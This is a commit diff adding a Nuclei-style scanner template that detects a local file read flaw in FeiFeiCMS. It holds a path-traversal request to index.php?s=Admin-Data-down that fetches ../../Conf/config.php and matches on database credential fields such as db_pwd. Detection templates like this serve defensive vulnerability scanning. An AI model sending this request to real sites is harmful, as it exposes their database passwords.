Create feifeicms-lfr.yaml
parent
314bb011a4
commit
797098e7fc
|
@ -0,0 +1,26 @@
|
||||||
|
id: feifeicms-lfr
|
||||||
|
info:
|
||||||
|
name: Feifeicms Local File Read
|
||||||
|
author: princechaddha
|
||||||
|
severity: high
|
||||||
|
tags: feifeicms,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/index.php?s=Admin-Data-down&id=../../Conf/config.php"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "<?php"
|
||||||
|
- "db_name"
|
||||||
|
- "db_pwd"
|
||||||
|
- "db_host"
|
||||||
|
condition: and
|
||||||
|
part: body
|
Loading…
Reference in New Issue